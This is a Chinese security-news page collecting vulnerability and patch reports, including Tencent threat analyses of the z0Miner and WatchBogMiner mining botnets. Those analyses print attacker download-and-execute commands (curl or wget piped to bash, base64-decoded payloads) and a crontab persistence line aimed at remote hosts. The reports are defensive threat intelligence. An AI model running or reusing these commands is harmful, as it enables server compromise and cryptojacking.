分类: 漏洞

谷歌发布 Chrome 86.0.4240.198 修复两个零日漏洞

ZDNet 报道称,谷歌在过去三周时间内,修复了影响 Chrome 浏览器的五个凌日漏洞。在今日发布的 Chrome 86.0.4240.198 版本中,就包括了最新的两个。据悉,此前的三个零日漏洞,是谷歌内部安全研究人员发现的。而这次紧急修复的两个,则来自于不愿透露姓名的消息人士。 截止发稿时,谷歌尚未披露两个零日漏洞攻击的详情。但在 Chrome 86.0.4240.198 的变更日志中,该公司还是提到了两个通用漏洞披露编号。 首先是 CVE-2020-16013,其描述涉及 Chrome 组件中处理 JavaScript 代码的 V8 引擎的不当实现。 其次是 CVE-2020-16017,其描述涉及 Chrome 组件中负责隔离不同站点数据的‘释放后使用’内存泄露 bug 。 两个 CVE 的披露时间分别为周一和周三,不过遗憾的是,目前尚不清楚这两个漏洞是否需要被结合在一起使用,但是可以单独发挥一定的破坏力。 在此之前,Google 还修补了以下三个零日漏洞: ● CVE-2020-15999:Chrome 浏览器的 FreeType 字体渲染库问题,谷歌在 10 月 20 日完成了与 Windows 零日漏洞(CVE-2020-17087)的修补,但拖到了本周。 ● CVE-2020-16009:同样涉及 Chrome 的 JavaScript V8 引擎,谷歌在 11 月 2 日完成了修复。 ● CVE-2020-16010:这次主要与 Chrome for Android 有关,主要影响浏览器的用户界面(UI)组件。 目前尚不清楚上述漏洞的严重程度,但谷歌还是建议大家尽快更新至 86.0.4240.198 。不过鉴于大多数零日漏洞攻击仅会瞄向少数极具针对性的目标,普通用户其实没必要太过恐慌。       (消息来源:cnBeta;封面来自网络)

微软修补了之前谷歌发现并披露的 Windows 零日漏洞

上个月,谷歌Project Zero的安全研究人员公布了Windows中一个正在被积极利用的零日漏洞的细节。黑客利用Windows内核加密驱动安全漏洞(CVE-2020-117087)在Windows 7、8、10以及Windows Server 2008和更高版本中获得高权限。作为昨晚发布的 “补丁星期二”的一部分,微软目前已经发布了该漏洞的修复程序。 被称为 “Windows Kernel Local Elevation of Privilege Vulnerability “的CVE-2020-17087早在10月22日就被微软曝光。通常情况下,Project Zero会在公开漏洞细节之前提供90天的宽限期,但由于该漏洞处于已经被利用的状态,因此将这一宽限期缩减至仅7天。 Project Zero团队解释道:Windows内核加密驱动(cng.sys)向用户模式程序暴露了一个\Device\CNG设备,并支持各种非常规输入结构的IOCTL。它构成了一个本地可访问的攻击面,可以利用它进行权限升级(甚至可被用于沙箱逃逸)。 在MSRC门户网站上,微软感谢Google Project Zero的Mateusz Jurczyk和Sergei Glazunov所做的工作,使开发团队迅速注意到了这个漏洞。 不同版本的Windows和Windows Server的修补程序链接可以在以下页面中找到: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17087       (消息来源:cnBeta;封面来自网络)

z0Miner 挖矿木马利用 Weblogic 最新漏洞入侵 5000 台服务器,腾讯主机安全(云镜)极速捕捉

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/cyPZpB4zkSQccViM0292Zg   一、概述 腾讯主机安全(云镜)于2020.11.02日捕获到挖矿木马团伙z0Miner利用Weblogic未授权命令执行漏洞(CVE-2020-14882/14883)的攻击行动。该团伙通过批量扫描云服务器发现具有Weblogic漏洞的机器,发送精心构造的数据包进行攻击。之后执行远程命令下载shell脚本z0.txt运行,再利用该shell脚本植入门罗币挖矿木马、挖矿任务本地持久化,以及通过爆破SSH横向移动。根据该团伙控制的算力推算,已有大约5000台服务器受害。 由于Weblogic未授权命令执行漏洞(CVE-2020-14882/14883)10月21日才被官方公布,有许多企业未来得及修复,同时该漏洞的补丁存在被绕过的风险。因此该挖矿木马可能对云主机造成较大威胁。 腾讯安全建议企业检查服务器上是否存在文件/tmp/javax/ssd2,检查crontab定时任务中是否存在可疑下载命令,删除挖矿木马文件和相关任务,检查Weblogic是否属于受影响版本并及时采取修复措施。 腾讯安全主机安全(云镜)、云防火墙、漏洞扫描系统、腾讯高级威胁检测系统(御界)均于10月28日升级,支持对该漏洞以及随后的补丁绕过风险进行检测和拦截。Oracle也于11月2日发布新安全更新,以解决CVE-2020-14882补丁被绕过的风险,腾讯安全专家建议用户尽快将Weblogic组件升级到最新版本。   腾讯安全系列产品应对z0Miner挖矿木马家族的响应清单如下: 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)z0Miner挖矿木马相关IOCs已入库。各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考: https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)z0Miner挖矿木马相关信息和情报已支持检索。网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考: https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)已支持识别检测z0Miner挖矿木马关联的IOCs; 2)已支持检测和拦截Weblogic未授权命令执行漏洞(CVE-2020-14882/14883) 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)已支持查杀z0Miner相关木马程序; 2)已支持检测Weblogic未授权命令执行漏洞(CVE-2020-14882/14883) 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 1)已支持检测Weblogic未授权命令执行漏洞(CVE-2020-14882/14883) 关于T-Sec高级威胁检测系统的更多信息,可参考:https://cloud.tencent.com/product/nta 二、详细分析 10月21日,Oracle官方发布数百个组件的高危漏洞公告。其中多个Weblogic组件相关高危漏洞引起业界高度关注。未经授权的攻击者可以绕过WebLogic后台登录等限制,直接远程利用反序列化漏洞,从而接管WebLogic服务器,风险极大。 10月28日,腾讯安全团队关注到互联网上已出现CVE-2020-14882和CVE-2020-14883两个高危漏洞POC(验证代码),未经身份验证的远程攻击者可能通过构造特殊的HTTP GET请求,利用该漏洞在受到攻击的WebLogic Server上执行任意代码。漏洞影响Oracle WebLogic Server的多个版本: 10.3.6.0.0(ZoomEye搜索结果) 12.1.3.0.0(ZoomEye搜索结果) 12.2.1.3.0(ZoomEye搜索结果) 12.2.1.4.0(ZoomEye搜索结果) 14.1.1.0.0(ZoomEye搜索结果)   11月02日腾讯云捕获到挖矿木马z0Miner利用CVE-2020-14882的攻击行为。攻击者精心构造具有CVE-2020-14882漏洞利用代码的数据包后,通过210.108.70.119向目标服务器发送请求。 漏洞攻击成功后在Payload中执行远程代码: curl -fsSL http[:]//218.61.5.109/errors/z0.txt-o /tmp/solrbash /tmp/solr 该代码下载shell脚本z0.txt保存为/tmp/solr并通过bash命令执行。z0.txt首先通过匹配进程和文件名清除竞品挖矿木马。 然后安装crontab定时任务进行持久化,定期下载木马https[:]//pastebin.com/raw/kkMGTEB4以及shell脚本https[:]//pastebin.com/raw/kkMGTEB4到失陷主机上运行,目前该URL返回数据为“exit”,可能在后续攻击中添加恶意代码。 通过SSH远程登陆已经认证过的机器进行横向移动,并在感染后执行远程命令: curl -fsSLhttp[:]//189.7.105.47:8181/examples/jsp/z0.txt | sh 最后下载门罗币挖矿木马javae.exe保存至/tmp/javax/ssd2,通过脚本config.sh启动挖矿。 挖矿木马采用开源挖矿程序XMRig编译,挖矿使用钱包 43vpvnvubbGUMuGffKAbwfeDYHRiDtBKWKUcncVttFMYHJyPV6DbHG7b3oSXSK52Fe3VF27zi9ai2CqCRcUvMmDbNMGWpuY。 由于该木马刚刚上线,目前挖矿获得收益只有0.1个XMR,但根据其算力133 KH/s推算其已控制约5000台服务器进行挖矿。 IOCs IP 222.108.2.20(ZoomEye搜索结果) 218.61.5.109(ZoomEye搜索结果) 189.7.105.47(ZoomEye搜索结果) 210.108.70.119(ZoomEye搜索结果)   Md5 javae.exe 373b018bef17e04d8ff29472390403f9 z0.txt 48072a4ad46bf20ddd6fdc6a19155c78 z0.txt 067a531e8580fe318ebff0b4038fbe6b config.sh 5020b71e9cd1144c57f39c9d4072201b   URL http[:]//222.108.2.20/about/javae.exe http[:]//218.61.5.109/errors/z0.txt http[:]//218.61.5.109/errors/config.sh http[:]//189.7.105.47:8181/examples/jsp/config.json http[:]//189.7.105.47:8181/examples/jsp/config.sh http[:]//189.7.105.47:8181/examples/jsp/z0.txt https[:]//pastebin.com/raw/qKcPmSNp https[:]//pastebin.com/raw/kkMGTEB4   钱包: 43vpvnvubbGUMuGffKAbwfeDYHRiDtBKWKUcncVttFMYHJyPV6DbHG7b3oSXSK52Fe3VF27zi9ai2CqCRcUvMmDbNMGWpuY   参考链接: 1.https://mp.weixin.qq.com/s/LIjO2St8PdvXm3lS5wsJPQ 2.https://mp.weixin.qq.com/s/6qsjUMJaUpUQHZYdsB3Ntw 3.https://blog.rapid7.com/2020/10/29/oracle-weblogic-unauthenticated-complete-takeover-cve-2020-14882-what-you-need-to-know/

Chrome 86.0.4240.183 稳定版发布:修复两个高危漏洞

在过去几周时间里,谷歌都在积极修复存在于 Chrome 浏览器中的多个安全漏洞。最新发现的一个漏洞存在于桌面端 Chrome 的 V8 JavaScript 引擎中,能够发起远程执行代码(RCE)攻击。而存在于 Android 端 Chrome 中的一个漏洞能从沙盒中逃脱。 谷歌威胁分析小组(TAG)和 Project Zero 团队的专家上周发现了零日漏洞 CVE-2020-16009。本周一,谷歌面向 Windows、macOS 和 Linux 发布了 Chrome 86.0.4240.183 更新,修复了上述漏洞。 该补丁说明除了说它与V8 JavaScript渲染引擎中的 “不适当的实现 “有关外,没有透露有关该安全漏洞的细节。它还提到这个弱点已经被积极利用。补丁说明中写道:“谷歌承认已经有黑客利用 CVE-2020-16009 漏洞发起了攻击”。 谷歌Project Zero的技术负责人Ben Hawkes在推特上表示,该缺陷允许攻击者进行RCE(远程代码执行)攻击。Hawkes还提到了Chrome安卓版的一个关键更新,修复了安卓手机上的 “沙盒逃逸”(CVE-2020-16010)。86.0.4240.183更新还包括其他几个高优先级安全补丁。谷歌建议立即更新桌面版和Android版Chrome浏览器。     (消息来源:cnBeta;封面来自网络)

HPE 修补了两个关键的远程可利用漏洞

Hewlett Packard Enterprise发布了针对两个关键漏洞的补丁程序,一个漏洞在StoreServ管理控制台中被确认,另一个漏洞则影响了BlueData EPIC软件平台和Ezmeral容器平台。 最严重的问题存在于HPE StoreServ管理控制台(SSMC)3.7.0.0中,CVE-2020-7197漏洞可以利用远程绕过身份验证保护,其CVSS评分为10。SSMC是基于节点的Web控制台,它为多个阵列的管理提供支持,通常安装在Linux或Windows服务器上,并与托管列上的数据隔离。该漏洞可能使黑客无需身份验证,直接获得对应用程序的访问权限。 MindPoint Group的Elwood Buck报告了规避远程身份验证的情况。根据HPE的说法,3.7.0.0之前的HP 3PAR StoreServ Management和Core Software Media受到影响。HPE建议受影响的用户将软件升级到HP 3PAR StoreServ3.7.1.1或更高版本。在BlueData EPIC软件平台版本4.0和更早版本以及Ezmeral Container Platform 5.0中确定了第二个漏洞CVE-2020-7196,其CVSS评分为9.9。HPE解释说,问题在于这两个应用程序“都使用不安全方法来处理Kerberos密码,导致密码容易受到未经授权的拦截和/或检索。” HPE建议将相关软件更新至Ezmeral Container Platform 5.1或更高版本。除此之外,HPE还在上周发布了针对Aruba CX交换机、Aruba AirWave Glass和其他Aruba产品中的几个高危漏洞的补丁程序。       消息来源:securityweek;封面来自网络;译者:小江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

微软建议用户尽快安装更新 免遭 Zerologon 漏洞攻击

微软表示,目前仍然有黑客利用Netlogon远程协议中的Zerologon漏洞(CVE-2020-1472)来入侵未安装安全性更新的计算机。虽然微软在8月份时已经推出了一连串的安全更新来解决这个漏洞,但是有不少用户,特别是企业用户依然没有更新他们的Windows服务器设备,使得他们继续暴露在提升特权攻击的危险中。 在面对没有安装安全性更新的系统时,攻击者可以利用Zerologon漏洞来骗过域账号,并且以此来窃取域名的敏感讯息甚至接管整个域的控制。 在一篇官方博客中,微软安全应对中心的工程副总裁Anachal Gupta呼吁还未更新的用户尽快安装8月份的安全性更新: “对于任何域控制器来说,安装2020年8月11日或以后的安全性更新是解决这个漏洞至关重要的第一步。在安装完成后,Active Directory域控制器以及受信任的账号将会与Windows域账户一起受到保护。因此我们强烈建议任何未更新的用户尽快安装安全性更新。客户在安装更新后需要按照KB4557222的指引来确保系统受到最好的保护。” 由于部分受到Zerologon漏洞影响的设备出现了验证问题,因此微软也正在分两个阶段推出修补漏洞的措施,同时也更新了原本的漏洞文檔里的FAQ来更清楚地解答用户的疑问。 而如果用户的系统是使用微软Defender for Identity者微软365 Defender的话,系统在受到Zerologon漏洞攻击时也可以马上通知用户。     (消息来源:cnBeta;封面来自网络)

腾讯主机安全(云镜)捕获 WatchBogMiner 挖矿木马新变种,利用 Apache Flink 漏洞攻击云主机

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/zviLvGK3wTnl0iwtszHQlg   一、概述 腾讯主机安全(云镜)捕获WatchBogMiner挖矿木马最新变种对云主机的攻击,该变种利用Apache Flink任意Jar包上传导致远程代码执行漏洞入侵云主机,然后下载文件名为“watohdog”的门罗币挖矿木马。 该挖矿木马最初的版本是针对Linux服务器利用Nexus Repository Manager、Supervisord、ThinkPHP等服务器组件的远程代码执行漏洞进行攻击。根据其最初下载的挖矿木马文件名,将其命名为“Watchbog”挖矿木马。 腾讯安全近期检测到“Watchbog”挖矿木马的最新变种开始利用Redis未授权访问漏洞、Apache Flink远程代码执行漏洞入侵传播,根据其算力推测,该变种已控制约8000台服务器挖矿,挖矿收益折合人民币约1.2万元。 腾讯安全系列产品应对WatchBogMiner最新变种的响应清单如下: 应用场景 安全产品 解决方案  威胁情报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)WatchBogMiner黑产团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)WatchBogMiner黑产团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持检测: 1)WatchBogMiner关联的IOCs; 2)Nexus Repository Manager 3远程代码执行漏洞(CVE-2019-7238)  ; 3)Supervisord远程命令执行漏洞(CVE-2017-11610); 4)ThinkPHP远程命令执行漏洞; 5)Apache FLink未授权上传jar包远程代码执行漏洞; 6)Redis未授权访问漏洞。   有关云防火墙的更多信息,可参考:https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 腾讯主机安全(云镜)已支持检测: 1)WatchBogMiner相关木马程序; 2)Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238)  ; 3)Supervisord远程命令执行漏洞(CVE-2017-11610); 4)ThinkPHP远程命令执行漏洞; 5)Apache FLink未授权上传jar包远程代码执行漏洞; 6)Redis未授权访问漏洞。   腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 腾讯御界基于网络流量进行威胁检测,已支持检测: 1)Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238)  ; 2)Supervisord远程命令执行漏洞(CVE-2017-11610); 3)ThinkPHP远程命令执行漏洞; 4)Apache FLink未授权上传jar包远程代码执行漏洞; 5)Redis未授权访问漏洞。   关于T-Sec高级威胁检测系统的更多信息,可参考:https://cloud.tencent.com/product/nta 二、详细分析 Apache Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Apache Flink提供了诸多更高抽象层的API以便用户编写分布式任务。 2019年11月Aapche Flink被爆出漏洞,攻击者可直接在Apache Flink中上传任意jar包,从而达到远程代码执行的目的。漏洞POC代码已被公开:https://github.com/LandGrey/flink-unauth-rce 攻击者首先利用Flink漏洞上传恶意jar包: 然后执行远程命令: /bin/bash -c (curl -s http[:]//nabladigital.biz/img/ddxox.png||wget -q -O- http[:]//nabladigital.biz/img/ddxox.png)|bash 其中ddxox.png代码: nohup bash -c '(curl -fsSL http[:]//nabladigital.biz/img/sghbw.png||wget -q -O- http[:]//nabladigital.biz/img/sghbw.png)|bash' > /dev/null 2>&1 &rm -rf /tmp/seele* sghbw.png代码: (curl -fsSL http[:]//nabladigital.biz/img/afhpo.png||wget -q -O - http[:]//nabladigital.biz/img/afhpo.png)|base64 -d|bash 最终执行的afhpo.png首先定义三个变量house、park、room house=http[:]//nabladigital.biz/img/ddxox.png park= https[:]//files.catbox.moe/5j9zcz room= https[:]//a.pomf.cat/wariie 然后crontab命令创建定时任务,每10分钟下载执行一次以上脚本: (crontab -l 2>/dev/null; echo "*/10 * * * * (curl -fsSL $house||wget -q -O- $house||curl -fsSL $park||wget -q -O- $park||curl -fsSLk $room||wget -q -O- $room)|bash > /dev/null 2>&1")| crontab – 通过写入以下文件创建定时任务: /etc/cron.d/root /etc/cron.d/system /etc/cron.d/apache /var/spool/cron/crontabs/root /var/spool/cron/root 接着下载挖矿木马http[:]//nabladigital.biz/img/qczgb.png,base64解码后保存至目录/tmp/systemd-private-64aa0008dfb47a84a96f7974811b772f-systemd-timesyncd.service-TffNff/tmp/watohdog(之前的版本,该文件名为watchbog)。 watohdog是XMRig经过修改编译的挖矿程序。 矿池:104.140.201.42:3333 钱包: 489cbwS5qsKFsNphUjABEyEvLCJWb3e9YDg5BE94MmyeGEbLQhK5DsSMEBGKo Ccvbg4oEjCWyRx21gu9XAo6QkhgNfkryRd 收益:已挖矿获得门罗币13.82XMR,折合人民币约1.2万元。平均算力103 KH/s,以此推算Watchbog最新变种已控制约8000台服务器挖矿。 IOCs Domain nabladigital.biz URL http[:]//nabladigital.biz/img/ddxox.png http[:]//nabladigital.biz/img/sghbw.png http[:]//nabladigital.biz/img/afhpo.png http[:]//nabladigital.biz/img/qczgb.png https[:]//files.catbox.moe/5j9zcz https[:]//a.pomf.cat/wariie MD5 Watohdog 1df8307ae2d2524628b1322ac864d96c ddxox.png 791e8ecf4dee71dd0e0da129b938258f sghbw.png ef5323cac300f68fb77ac23c39236bf2 afhpo.png 9ef94e8b41893c4b1a85c327a3bcae3f 钱包: 489cbwS5qsKFsNphUjABEyEvLCJWb3e9YDg5BE94MmyeGEbLQhK5DsSMEBGKo Ccvbg4oEjCWyRx21gu9XAo6QkhgNfkryRd 参考链接: 1. Apache Flink任意Jar包上传导致远程代码执行 https://mp.weixin.qq.com/s/ArYCF4jjhy6nkY4ypib-Ag 2. Apache Flink 任意 Jar 包上传导致远程代码执行漏洞复现 https://cloud.tencent.com/developer/article/1544254 (封面来自网络)

勒索软件 Nefilim 泄露了 Luxottica 的数据

Luxottica Group S.p.A 是全球眼镜行业最大的眼镜集团。作为一家垂直化公司,Luxottica集设计、制造、分销、零售一体化,还为Chanel、Prada、Giorgio Armani、Burberry、Versace等品牌设计太阳眼镜和镜架,拥有超过80,000名员工,在2019年创造了94亿美元的收入。 9月18日,该公司遭到网络攻击,部分运营网站无法访问。 意大利 媒体 报道,由于系统故障,部分Luxottica工厂的运营中断。经证实,该工厂的工作人员收到了一条SMS:“出现了严重的IT问题,9月21日暂停第二个工作班次。” 安全公司Bad Packets推测 Citrix ADX控制器设备受 CVE-2019-19781漏洞的影响,易让黑客利用勒索软件攻击公司系统。Luxottica尚未发布任何有关此次网络攻击的官方声明。被泄露数据包含相关招聘信息、简历机密以及人力资源部内部结构信息以及预算、市场预测分析等财务信息。 Nefilim勒索软件黑客还发布消息指控Luxottica未能正确处理网络攻击。     消息来源:securityaffairs ;封面来自网络;译者:小江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

黑客攻击 Cisco 设备中的 CVE-2020-3118 漏洞

Cisco警告针对CVE-2020-3118严重漏洞的攻击,该漏洞会影响多个Cisco IOS XR软件运营商级路由器的运行。 该缺陷存在于Cisco IOS XR软件的Cisco Discovery Protocol中,它可能导致黑客的攻击。 “该漏洞是Cisco Discovery Protocol中字段字符串输入的错误验证所致。黑客可以通过向受影响设备发送恶意Cisco Discovery Protocol数据包以利用漏洞。” “被成功利用的漏洞可能导致堆栈溢出,黑客便可以执行任意代码。” Cisco专家指出,其他黑客也可以利用此缺陷。美国国家安全局(NSA)声称该漏洞在漏洞排名中位居前25。 IOS XR网络操作系统 运行包括NCS 540 560、NCS 5500、8000和ASR 9000系列的Cisco路由器,该漏洞还会影响至少全球范围内都启用了Cisco Discovery Protocol的第三方白盒路由器和Cisco产品。Cisco于2020年2月解决了CVE-2020-3118漏洞,以CDPwn跟踪其他四个严重问题。 “最新报告指出:2020年10月,Cisco安全团队(PSIRT)收到了尝试利用此漏洞的报告。” “Cisco建议客户升级Cisco IOS XR版本以修复此漏洞。”       消息来源:securityaffairs;译者:小江;封面来自网络。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

Chrome 86.0.4240.111 已修复 CVE-2020-15999 零日漏洞

谷歌在今天早些时候推出了 Chrome 浏览器的 86.0.4240.111 版本,以修复正在被积极利用的 CVE-2020-15999 零日漏洞。据悉,该漏洞源于 Chrome 中随附的 FreeType 字体渲染库的内存崩溃 bug,随后谷歌内部安全团队之一的 Project Zero 研究人员发现了针对该漏洞的野外攻击。 团队负责人 Ben Hawkes 表示,其发现别有用心者正在滥用 FreeType Bug 对 Chrome 用户发起攻击。 尽管在今日早些时候发布的 FreeType 2.10.4 版本中,已经包含了针对该漏洞的补丁修复,但 Ben Hawkes 还是敦促使用相同字体渲染库的其它厂商也尽快更新其软件,以防止此类攻击的扩大化。 Chrome 用户可通过浏览器内置的更新功能(菜单 -> 帮助 -> 关于),升级到最新的 86.0.4240.111 版本。 等到其它软件厂商在未来几个月内实施了修复之后,想必谷歌 Project Zero 也会披露有关有 CVE-2020-15999 漏洞利用的更多细节。 据悉,CVE-2020-15999 是过去 12 个月以来,第三次被发现存在野外利用的 Chrome 零日漏洞(此前还有 2019 年 10 月的 CVE-2019-13720、以及 2020 年 2 月的 CVE-2020-6418)。 感兴趣的朋友,可移步至 FreeType 开源项目主页了解这个零日漏洞。     (消息来源:cnbeta,封面来自网络)